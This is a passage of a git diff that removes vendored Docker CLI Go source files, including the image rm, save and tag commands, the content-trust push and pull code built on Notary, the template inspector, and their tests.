+0,0 @@ -package image - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - force bool - noPrune bool -} - -// NewRemoveCommand creates a new `docker remove` command -func NewRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rmi [OPTIONS] IMAGE [IMAGE...]", - Short: "Remove one or more images", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, opts, args) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.force, "force", "f", false, "Force removal of the image") - flags.BoolVar(&opts.noPrune, "no-prune", false, "Do not delete untagged parents") - - return cmd -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := *NewRemoveCommand(dockerCli) - cmd.Aliases = []string{"rmi", "remove"} - cmd.Use = "rm [OPTIONS] IMAGE [IMAGE...]" - return &cmd -} - -func runRemove(dockerCli *command.DockerCli, opts removeOptions, images []string) error { - client := dockerCli.Client() - ctx := context.Background() - - options := types.ImageRemoveOptions{ - Force: opts.force, - PruneChildren: !opts.noPrune, - } - - var errs []string - for _, image := range images { - dels, err := client.ImageRemove(ctx, image, options) - if err != nil { - errs = append(errs, err.Error()) - } else { - for _, del := range dels { - if del.Deleted != "" { - fmt.Fprintf(dockerCli.Out(), "Deleted: %s\n", del.Deleted) - } else { - fmt.Fprintf(dockerCli.Out(), "Untagged: %s\n", del.Untagged) - } - } - } - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/save.go b/vendor/github.com/docker/docker/cli/command/image/save.go deleted file mode 100644 index bbe82d2a05..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/save.go +++ /dev/null @@ -1,57 +0,0 @@ -package image - -import ( - "errors" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type saveOptions struct { - images []string - output string -} - -// NewSaveCommand creates a new `docker save` command -func NewSaveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts saveOptions - - cmd := &cobra.Command{ - Use: "save [OPTIONS] IMAGE [IMAGE...]", - Short: "Save one or more images to a tar archive (streamed to STDOUT by default)", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.images = args - return runSave(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") - - return cmd -} - -func runSave(dockerCli *command.DockerCli, opts saveOptions) error { - if opts.output == "" && dockerCli.Out().IsTerminal() { - return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.") - } - - responseBody, err := dockerCli.Client().ImageSave(context.Background(), opts.images) - if err != nil { - return err - } - defer responseBody.Close() - - if opts.output == "" { - _, err := io.Copy(dockerCli.Out(), responseBody) - return err - } - - return command.CopyToFile(opts.output, responseBody) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/tag.go b/vendor/github.com/docker/docker/cli/command/image/tag.go deleted file mode 100644 index fb2b703856..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/tag.go +++ /dev/null @@ -1,41 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type tagOptions struct { - image string - name string -} - -// NewTagCommand creates a new `docker tag` command -func NewTagCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts tagOptions - - cmd := &cobra.Command{ - Use: "tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]", - Short: "Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.image = args[0] - opts.name = args[1] - return runTag(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - return cmd -} - -func runTag(dockerCli *command.DockerCli, opts tagOptions) error { - ctx := context.Background() - - return dockerCli.Client().ImageTag(ctx, opts.image, opts.name) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/trust.go b/vendor/github.com/docker/docker/cli/command/image/trust.go deleted file mode 100644 index 5136a22156..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/trust.go +++ /dev/null @@ -1,381 +0,0 @@ -package image - -import ( - "encoding/hex" - "encoding/json" - "errors" - "fmt" - "io" - "path" - "sort" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/trust" - "github.com/docker/docker/distribution" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/docker/notary/client" - "github.com/docker/notary/tuf/data" -) - -type target struct { - name string - digest digest.Digest - size int64 -} - -// trustedPush handles content trust pushing of an image -func trustedPush(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { - responseBody, err := imagePushPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege) - if err != nil { - return err - } - - defer responseBody.Close() - - return PushTrustedReference(cli, repoInfo, ref, authConfig, responseBody) -} - -// PushTrustedReference pushes a canonical reference to the trust server. -func PushTrustedReference(cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, in io.Reader) error { - // If it is a trusted push we would like to find the target entry which match the - // tag provided in the function and then do an AddTarget later. - target := &client.Target{} - // Count the times of calling for handleTarget, - // if it is called more that once, that should be considered an error in a trusted push. - cnt := 0 - handleTarget := func(aux *json.RawMessage) { - cnt++ - if cnt > 1 { - // handleTarget should only be called one. This will be treated as an error. - return - } - - var pushResult distribution.PushResult - err := json.Unmarshal(*aux, &pushResult) - if err == nil && pushResult.Tag != "" && pushResult.Digest.Validate() == nil { - h, err := hex.DecodeString(pushResult.Digest.Hex()) - if err != nil { - target = nil - return - } - target.Name = pushResult.Tag - target.Hashes = data.Hashes{string(pushResult.Digest.Algorithm()): h} - target.Length = int64(pushResult.Size) - } - } - - var tag string - switch x := ref.(type) { - case reference.Canonical: - return errors.New("cannot push a digest reference") - case reference.NamedTagged: - tag = x.Tag() - default: - // We want trust signatures to always take an explicit tag, - // otherwise it will act as an untrusted push. - if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), nil); err != nil { - return err - } - fmt.Fprintln(cli.Out(), "No tag specified, skipping trust metadata push") - return nil - } - - if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), handleTarget); err != nil { - return err - } - - if cnt > 1 { - return fmt.Errorf("internal error: only one call to handleTarget expected") - } - - if target == nil { - fmt.Fprintln(cli.Out(), "No targets found, please provide a specific tag in order to sign it") - return nil - } - - fmt.Fprintln(cli.Out(), "Signing and pushing trust metadata") - - repo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "push", "pull") - if err != nil { - fmt.Fprintf(cli.Out(), "Error establishing connection to notary repository: %s\n", err) - return err - } - - // get the latest repository metadata so we can figure out which roles to sign - err = repo.Update(false) - - switch err.(type) { - case client.ErrRepoNotInitialized, client.ErrRepositoryNotExist: - keys := repo.CryptoService.ListKeys(data.CanonicalRootRole) - var rootKeyID string - // always select the first root key - if len(keys) > 0 { - sort.Strings(keys) - rootKeyID = keys[0] - } else { - rootPublicKey, err := repo.CryptoService.Create(data.CanonicalRootRole, "", data.ECDSAKey) - if err != nil { - return err - } - rootKeyID = rootPublicKey.ID() - } - - // Initialize the notary repository with a remotely managed snapshot key - if err := repo.Initialize([]string{rootKeyID}, data.CanonicalSnapshotRole); err != nil { - return trust.NotaryError(repoInfo.FullName(), err) - } - fmt.Fprintf(cli.Out(), "Finished initializing %q\n", repoInfo.FullName()) - err = repo.AddTarget(target, data.CanonicalTargetsRole) - case nil: - // already initialized and we have successfully downloaded the latest metadata - err = addTargetToAllSignableRoles(repo, target) - default: - return trust.NotaryError(repoInfo.FullName(), err) - } - - if err == nil { - err = repo.Publish() - } - - if err != nil { - fmt.Fprintf(cli.Out(), "Failed to sign %q:%s - %s\n", repoInfo.FullName(), tag, err.Error()) - return trust.NotaryError(repoInfo.FullName(), err) - } - - fmt.Fprintf(cli.Out(), "Successfully signed %q:%s\n", repoInfo.FullName(), tag) - return nil -} - -// Attempt to add the image target to all the top level delegation roles we can -// (based on whether we have the signing key and whether the role's path allows -// us to). -// If there are no delegation roles, we add to the targets role. -func addTargetToAllSignableRoles(repo *client.NotaryRepository, target *client.Target) error { - var signableRoles []string - - // translate the full key names, which includes the GUN, into just the key IDs - allCanonicalKeyIDs := make(map[string]struct{}) - for fullKeyID := range repo.CryptoService.ListAllKeys() { - allCanonicalKeyIDs[path.Base(fullKeyID)] = struct{}{} - } - - allDelegationRoles, err := repo.GetDelegationRoles() - if err != nil { - return err - } - - // if there are no delegation roles, then just try to sign it into the targets role - if len(allDelegationRoles) == 0 { - return repo.AddTarget(target, data.CanonicalTargetsRole) - } - - // there are delegation roles, find every delegation role we have a key for, and - // attempt to sign into into all those roles. - for _, delegationRole := range allDelegationRoles { - // We do not support signing any delegation role that isn't a direct child of the targets role. - // Also don't bother checking the keys if we can't add the target - // to this role due to path restrictions - if path.Dir(delegationRole.Name) != data.CanonicalTargetsRole || !delegationRole.CheckPaths(target.Name) { - continue - } - - for _, canonicalKeyID := range delegationRole.KeyIDs { - if _, ok := allCanonicalKeyIDs[canonicalKeyID]; ok { - signableRoles = append(signableRoles, delegationRole.Name) - break - } - } - } - - if len(signableRoles) == 0 { - return fmt.Errorf("no valid signing keys for delegation roles") - } - - return repo.AddTarget(target, signableRoles...) -} - -// imagePushPrivileged push the image -func imagePushPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc) (io.ReadCloser, error) { - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return nil, err - } - options := types.ImagePushOptions{ - RegistryAuth: encodedAuth, - PrivilegeFunc: requestPrivilege, - } - - return cli.Client().ImagePush(ctx, ref, options) -} - -// trustedPull handles content trust pulling of an image -func trustedPull(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { - var refs []target - - notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") - if err != nil { - fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) - return err - } - - if tagged, isTagged := ref.(reference.NamedTagged); !isTagged { - // List all targets - targets, err := notaryRepo.ListTargets(trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return trust.NotaryError(repoInfo.FullName(), err) - } - for _, tgt := range targets { - t, err := convertTarget(tgt.Target) - if err != nil { - fmt.Fprintf(cli.Out(), "Skipping target for %q\n", repoInfo.Name()) - continue - } - // Only list tags in the top level targets role or the releases delegation role - ignore - // all other delegation roles - if tgt.Role != trust.ReleasesRole && tgt.Role != data.CanonicalTargetsRole { - continue - } - refs = append(refs, t) - } - if len(refs) == 0 { - return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trusted tags for %s", repoInfo.FullName())) - } - } else { - t, err := notaryRepo.GetTargetByName(tagged.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return trust.NotaryError(repoInfo.FullName(), err) - } - // Only get the tag if it's in the top level targets role or the releases delegation role - // ignore it if it's in any other delegation roles - if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { - return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", tagged.Tag())) - } - - logrus.Debugf("retrieving target for %s role\n", t.Role) - r, err := convertTarget(t.Target) - if err != nil { - return err - - } - refs = append(refs, r) - } - - for i, r := range refs { - displayTag := r.name - if displayTag != "" { - displayTag = ":" + displayTag - } - fmt.Fprintf(cli.Out(), "Pull (%d of %d): %s%s@%s\n", i+1, len(refs), repoInfo.Name(), displayTag, r.digest) - - ref, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) - if err != nil { - return err - } - if err := imagePullPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege, false); err != nil { - return err - } - - tagged, err := reference.WithTag(repoInfo, r.name) - if err != nil { - return err - } - trustedRef, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) - if err != nil { - return err - } - if err := TagTrusted(ctx, cli, trustedRef, tagged); err != nil { - return err - } - } - return nil -} - -// imagePullPrivileged pulls the image and displays it to the output -func imagePullPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc, all bool) error { - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - options := types.ImagePullOptions{ - RegistryAuth: encodedAuth, - PrivilegeFunc: requestPrivilege, - All: all, - } - - responseBody, err := cli.Client().ImagePull(ctx, ref, options) - if err != nil { - return err - } - defer responseBody.Close() - - return jsonmessage.DisplayJSONMessagesToStream(responseBody, cli.Out(), nil) -} - -// TrustedReference returns the canonical trusted reference for an image reference -func TrustedReference(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged, rs registry.Service) (reference.Canonical, error) { - var ( - repoInfo *registry.RepositoryInfo - err error - ) - if rs != nil { - repoInfo, err = rs.ResolveRepository(ref) - } else { - repoInfo, err = registry.ParseRepositoryInfo(ref) - } - if err != nil { - return nil, err - } - - // Resolve the Auth config relevant for this server - authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) - - notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") - if err != nil { - fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) - return nil, err - } - - t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return nil, trust.NotaryError(repoInfo.FullName(), err) - } - // Only list tags in the top level targets role or the releases delegation role - ignore - // all other delegation roles - if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { - return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.Tag())) - } - r, err := convertTarget(t.Target) - if err != nil { - return nil, err - - } - - return reference.WithDigest(reference.TrimNamed(ref), r.digest) -} - -func convertTarget(t client.Target) (target, error) { - h, ok := t.Hashes["sha256"] - if !ok { - return target{}, errors.New("no valid hash, expecting sha256") - } - return target{ - name: t.Name, - digest: digest.NewDigestFromHex("sha256", hex.EncodeToString(h)), - size: t.Length, - }, nil -} - -// TagTrusted tags a trusted ref -func TagTrusted(ctx context.Context, cli *command.DockerCli, trustedRef reference.Canonical, ref reference.NamedTagged) error { - fmt.Fprintf(cli.Out(), "Tagging %s as %s\n", trustedRef.String(), ref.String()) - - return cli.Client().ImageTag(ctx, trustedRef.String(), ref.String()) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/trust_test.go b/vendor/github.com/docker/docker/cli/command/image/trust_test.go deleted file mode 100644 index 78146465e6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/trust_test.go +++ /dev/null @@ -1,57 +0,0 @@ -package image - -import ( - "os" - "testing" - - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli/trust" - "github.com/docker/docker/registry" -) - -func unsetENV() { - os.Unsetenv("DOCKER_CONTENT_TRUST") - os.Unsetenv("DOCKER_CONTENT_TRUST_SERVER") -} - -func TestENVTrustServer(t *testing.T) { - defer unsetENV() - indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} - if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "https://notary-test.com:5000"); err != nil { - t.Fatal("Failed to set ENV variable") - } - output, err := trust.Server(indexInfo) - expectedStr := "https://notary-test.com:5000" - if err != nil || output != expectedStr { - t.Fatalf("Expected server to be %s, got %s", expectedStr, output) - } -} - -func TestHTTPENVTrustServer(t *testing.T) { - defer unsetENV() - indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} - if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "http://notary-test.com:5000"); err != nil { - t.Fatal("Failed to set ENV variable") - } - _, err := trust.Server(indexInfo) - if err == nil { - t.Fatal("Expected error with invalid scheme") - } -} - -func TestOfficialTrustServer(t *testing.T) { - indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: true} - output, err := trust.Server(indexInfo) - if err != nil || output != registry.NotaryServer { - t.Fatalf("Expected server to be %s, got %s", registry.NotaryServer, output) - } -} - -func TestNonOfficialTrustServer(t *testing.T) { - indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: false} - output, err := trust.Server(indexInfo) - expectedStr := "https://" + indexInfo.Name - if err != nil || output != expectedStr { - t.Fatalf("Expected server to be %s, got %s", expectedStr, output) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/in.go b/vendor/github.com/docker/docker/cli/command/in.go deleted file mode 100644 index 7204b7ad04..0000000000 --- a/vendor/github.com/docker/docker/cli/command/in.go +++ /dev/null @@ -1,75 +0,0 @@ -package command - -import ( - "errors" - "io" - "os" - "runtime" - - "github.com/docker/docker/pkg/term" -) - -// InStream is an input stream used by the DockerCli to read user input -type InStream struct { - in io.ReadCloser - fd uintptr - isTerminal bool - state *term.State -} - -func (i *InStream) Read(p []byte) (int, error) { - return i.in.Read(p) -} - -// Close implements the Closer interface -func (i *InStream) Close() error { - return i.in.Close() -} - -// FD returns the file descriptor number for this stream -func (i *InStream) FD() uintptr { - return i.fd -} - -// IsTerminal returns true if this stream is connected to a terminal -func (i *InStream) IsTerminal() bool { - return i.isTerminal -} - -// SetRawTerminal sets raw mode on the input terminal -func (i *InStream) SetRawTerminal() (err error) { - if os.Getenv("NORAW") != "" || !i.isTerminal { - return nil - } - i.state, err = term.SetRawTerminal(i.fd) - return err -} - -// RestoreTerminal restores normal mode to the terminal -func (i *InStream) RestoreTerminal() { - if i.state != nil { - term.RestoreTerminal(i.fd, i.state) - } -} - -// CheckTty checks if we are trying to attach to a container tty -// from a non-tty client input stream, and if so, returns an error. -func (i *InStream) CheckTty(attachStdin, ttyMode bool) error { - // In order to attach to a container tty, input stream for the client must - // be a tty itself: redirecting or piping the client standard input is - // incompatible with `docker run -t`, `docker exec -t` or `docker attach`. - if ttyMode && attachStdin && !i.isTerminal { - eText := "the input device is not a TTY" - if runtime.GOOS == "windows" { - return errors.New(eText + ". If you are using mintty, try prefixing the command with 'winpty'") - } - return errors.New(eText) - } - return nil -} - -// NewInStream returns a new InStream object from a ReadCloser -func NewInStream(in io.ReadCloser) *InStream { - fd, isTerminal := term.GetFdInfo(in) - return &InStream{in: in, fd: fd, isTerminal: isTerminal} -} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go deleted file mode 100644 index 1d81643fb1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go +++ /dev/null @@ -1,195 +0,0 @@ -package inspect - -import ( - "bytes" - "encoding/json" - "fmt" - "io" - "text/template" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/cli" - "github.com/docker/docker/utils/templates" -) - -// Inspector defines an interface to implement to process elements -type Inspector interface { - Inspect(typedElement interface{}, rawElement []byte) error - Flush() error -} - -// TemplateInspector uses a text template to inspect elements. -type TemplateInspector struct { - outputStream io.Writer - buffer *bytes.Buffer - tmpl *template.Template -} - -// NewTemplateInspector creates a new inspector with a template. -func NewTemplateInspector(outputStream io.Writer, tmpl *template.Template) Inspector { - return &TemplateInspector{ - outputStream: outputStream, - buffer: new(bytes.Buffer), - tmpl: tmpl, - } -} - -// NewTemplateInspectorFromString creates a new TemplateInspector from a string -// which is compiled into a template. -func NewTemplateInspectorFromString(out io.Writer, tmplStr string) (Inspector, error) { - if tmplStr == "" { - return NewIndentedInspector(out), nil - } - - tmpl, err := templates.Parse(tmplStr) - if err != nil { - return nil, fmt.Errorf("Template parsing error: %s", err) - } - return NewTemplateInspector(out, tmpl), nil -} - -// GetRefFunc is a function which used by Inspect to fetch an object from a -// reference -type GetRefFunc func(ref string) (interface{}, []byte, error) - -// Inspect fetches objects by reference using GetRefFunc and writes the json -// representation to the output writer. -func Inspect(out io.Writer, references []string, tmplStr string, getRef GetRefFunc) error { - inspector, err := NewTemplateInspectorFromString(out, tmplStr) - if err != nil { - return cli.StatusError{StatusCode: 64, Status: err.Error()} - } - - var inspectErr error - for _, ref := range references { - element, raw, err := getRef(ref) - if err != nil { - inspectErr = err - break - } - - if err := inspector.Inspect(element, raw); err != nil { - inspectErr = err - break - } - } - - if err := inspector.Flush(); err != nil { - logrus.Errorf("%s\n", err) - } - - if inspectErr != nil { - return cli.StatusError{StatusCode: 1, Status: inspectErr.Error()} - } - return nil -} - -// Inspect executes the inspect template. -// It decodes the raw element into a map if the initial execution fails. -// This allows docker cli to parse inspect structs injected with Swarm fields. -func (i *TemplateInspector) Inspect(typedElement interface{}, rawElement []byte) error { - buffer := new(bytes.Buffer) - if err := i.tmpl.Execute(buffer, typedElement); err != nil { - if rawElement == nil { - return fmt.Errorf("Template parsing error: %v", err) - } - return i.tryRawInspectFallback(rawElement) - } - i.buffer.Write(buffer.Bytes()) - i.buffer.WriteByte('\n') - return nil -} - -// tryRawInspectFallback executes the inspect template with a raw interface. -// This allows docker cli to parse inspect structs injected with Swarm fields. -func (i *TemplateInspector) tryRawInspectFallback(rawElement []byte) error { - var raw interface{} - buffer := new(bytes.Buffer) - rdr := bytes.NewReader(rawElement) - dec := json.NewDecoder(rdr) - - if rawErr := dec.Decode(&raw); rawErr != nil { - return fmt.Errorf("unable to read inspect data: %v", rawErr) - } - - tmplMissingKey := i.tmpl.Option("missingkey=error") - if rawErr := tmplMissingKey.Execute(buffer, raw); rawErr != nil { - return fmt.Errorf("Template parsing error: %v", rawErr) - } - - i.buffer.Write(buffer.Bytes()) - i.buffer.WriteByte('\n') - return nil -} - -// Flush writes the result of inspecting all elements into the output stream. -func (i *TemplateInspector) Flush() error { - if i.buffer.Len() == 0 { - _, err := io.WriteString(i.outputStream, "\n") - return err - } - _, err := io.Copy(i.outputStream, i.buffer) - return err -} - -// IndentedInspector uses a buffer to stop the indented representation of an element. -type IndentedInspector struct { - outputStream io.Writer - elements []interface{} - rawElements [][]byte -} - -// NewIndentedInspector generates a new IndentedInspector. -func NewIndentedInspector(outputStream io.Writer) Inspector { - return &IndentedInspector{ - outputStream: outputStream, - } -} - -// Inspect writes the raw element with an indented json format. -func (i *IndentedInspector) Inspect(typedElement interface{}, rawElement []byte) error { - if rawElement != nil { - i.rawElements = append(i.rawElements, rawElement) - } else { - i.elements = append(i.elements, typedElement) - } - return nil -} - -// Flush writes the result of inspecting all elements into the output stream. -func (i *IndentedInspector) Flush() error { - if len(i.elements) == 0 && len(i.rawElements) == 0 { - _, err := io.WriteString(i.outputStream, "[]\n") - return err - } - - var buffer io.Reader - if len(i.rawElements) > 0 { - bytesBuffer := new(bytes.Buffer) - bytesBuffer.WriteString("[") - for idx, r := range i.rawElements { - bytesBuffer.Write(r) - if idx < len(i.rawElements)-1 { - bytesBuffer.WriteString(",") - } - } - bytesBuffer.WriteString("]") - indented := new(bytes.Buffer) - if err := json.Indent(indented, bytesBuffer.Bytes(), "", " "); err != nil { - return err - } - buffer = indented - } else { - b, err := json.MarshalIndent(i.elements, "", " ") - if err != nil { - return err - } - buffer = bytes.NewReader(b) - } - - if _, err := io.Copy(i.outputStream, buffer); err != nil { - return err - } - _, err := io.WriteString(i.outputStream, "\n") - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go deleted file mode 100644 index 1ce1593ab7..0000000000 --- a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go +++ /dev/null @@ -1,221 +0,0 @@ -package inspect - -import ( - "bytes" - "strings" - "testing" - - "github.com/docker/docker/utils/templates" -) - -type testElement struct { - DNS string `json:"Dns"` -} - -func TestTemplateInspectorDefault(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.DNS}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "0.0.0.0\n" { - t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) - } -} - -func TestTemplateInspectorEmpty(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.DNS}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "\n" { - t.Fatalf("Expected `\\n`, got `%s`", b.String()) - } -} - -func TestTemplateInspectorTemplateError(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.Foo}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - - err = i.Inspect(testElement{"0.0.0.0"}, nil) - if err == nil { - t.Fatal("Expected error got nil") - } - - if !strings.HasPrefix(err.Error(), "Template parsing error") { - t.Fatalf("Expected template error, got %v", err) - } -} - -func TestTemplateInspectorRawFallback(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.Dns}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0"}`)); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "0.0.0.0\n" { - t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) - } -} - -func TestTemplateInspectorRawFallbackError(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.Dns}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - err = i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Foo": "0.0.0.0"}`)) - if err == nil { - t.Fatal("Expected error got nil") - } - - if !strings.HasPrefix(err.Error(), "Template parsing error") { - t.Fatalf("Expected template error, got %v", err) - } -} - -func TestTemplateInspectorMultiple(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.DNS}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "0.0.0.0\n1.1.1.1\n" { - t.Fatalf("Expected `0.0.0.0\\n1.1.1.1\\n`, got `%s`", b.String()) - } -} - -func TestIndentedInspectorDefault(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := `[ - { - "Dns": "0.0.0.0" - } -] -` - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} - -func TestIndentedInspectorMultiple(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := `[ - { - "Dns": "0.0.0.0" - }, - { - "Dns": "1.1.1.1" - } -] -` - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} - -func TestIndentedInspectorEmpty(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := "[]\n" - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} - -func TestIndentedInspectorRawElements(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0", "Node": "0"}`)); err != nil { - t.Fatal(err) - } - - if err := i.Inspect(testElement{"1.1.1.1"}, []byte(`{"Dns": "1.1.1.1", "Node": "1"}`)); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := `[ - { - "Dns": "0.0.0.0", - "Node": "0" - }, - { - "Dns": "1.1.1.1", - "Node": "1" - } -] -` - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/network/cmd.go b/vendor/github.com/docker/docker/cli/command/network/cmd.go deleted file mode 100644 index ab8393cded..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/cmd.go +++ /dev/null @@ -1,28 +0,0 @@ -package network - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewNetworkCommand returns a cobra command for `network` subcommands -func NewNetworkCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "network", - Short: "Manage networks", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newConnectCommand(dockerCli), - newCreateCommand(dockerCli), - 